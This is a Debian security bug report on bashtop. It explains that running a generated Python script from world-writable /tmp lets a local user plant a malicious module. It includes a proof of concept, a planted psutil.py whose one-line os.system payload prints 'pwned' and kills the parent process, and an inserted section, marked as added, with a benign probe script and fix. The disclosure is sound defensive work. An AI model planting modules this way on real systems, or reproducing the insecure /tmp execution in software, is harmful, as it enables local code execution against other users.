Package: bashtop
Version: 0.9.19-1
Severity: grave
Tags: security
bashtop creates a Python script in /tmp and runs it. But Python adds the
directory containing the script to the module search path¹, and /tmp is
world-writable, so this is insecure. A local user could plant a malicious
Python module in /tmp, which would be executed by bashtop.
Proof of concept:
$ install -m 644 /path/to/psutil.py /tmp
$ bashtop
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
Aborted
¹ https://docs.python.org/3/using/cmdline.html#cmdarg-script
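The following is an added example, not part of this report or of bashtop. It reproduces the mechanism above in a harmless form and checks the fix a maintainer would apply: a module file placed next to the launched script shadows a real import when the script is run with a plain `python3 script.py`, and stops doing so when the interpreter is started with `-I` (isolated mode), which does not add the script's directory to sys.path. The module name `shadow_me`, the marker string and the use of a private mkdtemp() directory are all constructed for this example; a real launcher should combine both measures, writing the script into a fresh 0700 directory rather than /tmp and starting the interpreter with `-I`.

```python
"""Probe whether a launcher that runs a Python script from a scratch
directory is exposed to module shadowing, and whether -I closes it."""
import os
import shutil
import subprocess
import sys
import tempfile
import textwrap

# Benign stand-in for a planted module (constructed for this example):
# it only exports a marker string.
PLANTED_MODULE = 'MARK = "planted"\n'

# The launched script imports a module by name, just as a script doing
# `import psutil` would, and reports which file satisfied the import.
PROBE_SCRIPT = textwrap.dedent("""\
    try:
        import shadow_me
        print(shadow_me.MARK)
    except ImportError:
        print("not-found")
""")


def run_probe(isolated: bool) -> str:
    """Write probe.py and shadow_me.py side by side in a fresh private
    directory, run the probe, and return what the import resolved to.

    isolated=False: `python3 probe.py`; the interpreter prepends the
    script's directory to sys.path, so the file beside the script wins.
    isolated=True: `python3 -I probe.py`; the script directory is not
    added to sys.path, so the planted file is never considered.
    """
    workdir = tempfile.mkdtemp(prefix="probe-")  # created mode 0700
    try:
        with open(os.path.join(workdir, "shadow_me.py"), "w") as f:
            f.write(PLANTED_MODULE)
        script = os.path.join(workdir, "probe.py")
        with open(script, "w") as f:
            f.write(PROBE_SCRIPT)
        cmd = [sys.executable] + (["-I"] if isolated else []) + [script]
        proc = subprocess.run(cmd, capture_output=True, text=True, check=True)
        return proc.stdout.strip()
    finally:
        # rmtree rather than rmdir: importing shadow_me may leave a
        # __pycache__ directory behind.
        shutil.rmtree(workdir, ignore_errors=True)


if __name__ == "__main__":
    print("default :", run_probe(isolated=False))  # planted
    print("isolated:", run_probe(isolated=True))   # not-found
```

The private directory alone removes the world-writable /tmp problem for this script; `-I` additionally removes the script directory (and PYTHONPATH and user site-packages) from the search path, so a stray file beside the script cannot be picked up even if the directory is later exposed. Python 3.11 and newer also offer `-P`, which drops only the script-directory entry.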
-- System Information:
Architecture: i386
Versions of packages bashtop depends on:
ii bash 5.0-6
ii gawk 1:5.0.1+dfsg-1
ii procps 2:3.3.16-5
Versions of packages bashtop recommends:
ii lm-sensors 1:3.6.0-2
un sysstat <none>
ii python3-psutil 5.7.0-1
ii curl 7.68.0-1
--
Jakub Wilk
import os; os.system('(tput reset && cowsay pwned) >/dev/tty; kill -ABRT %s' % os.getppid())